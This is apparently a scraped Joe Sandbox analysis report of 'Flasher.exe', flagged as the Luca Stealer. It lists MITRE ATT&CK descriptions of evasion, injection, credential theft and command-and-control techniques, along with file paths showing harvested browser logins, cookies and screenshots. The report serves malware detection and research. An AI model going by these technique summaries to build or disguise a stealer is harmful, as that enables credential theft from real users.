Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 6a9c4381ea9c00087b1e23369b031baf89df40bcd12c89f507af828d6ea171e0
Instruction ID: 9d619fcbb3e4b5d8528db13d92c36e4edf9318ba745fbfdbd663cc9087882565
Opcode Fuzzy Hash: 6a9c4381ea9c00087b1e23369b031baf89df40bcd12c89f507af828d6ea171e0
Instruction Fuzzy Hash: 1CD05E11F097C640FF149B97B14606D82909F8CBD0A4C9035EE1C9B79AEC3CD4A08704

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Flasher.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Luca Stealer

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\cookies_google_default.txt

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\screen1.png

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\sensfiles.zip

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\user_info.txt

C:\Users\user\AppData\Local\Temp\7star_default_login_data

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ll2zqwp.k5f.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_colef2rh.bkg.ps1

C:\Users\user\AppData\Local\Temp\amigo_default_login_data

C:\Users\user\AppData\Local\Temp\bravesoftware_default_login_data

C:\Users\user\AppData\Local\Temp\bravesoftware_default_webdata

C:\Users\user\AppData\Local\Temp\bravesoftware_network_cookies

C:\Users\user\AppData\Local\Temp\browser_default_login_data

C:\Users\user\AppData\Local\Temp\browser_default_webdata

C:\Users\user\AppData\Local\Temp\browser_network_cookies

Windows Analysis Report
Flasher.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre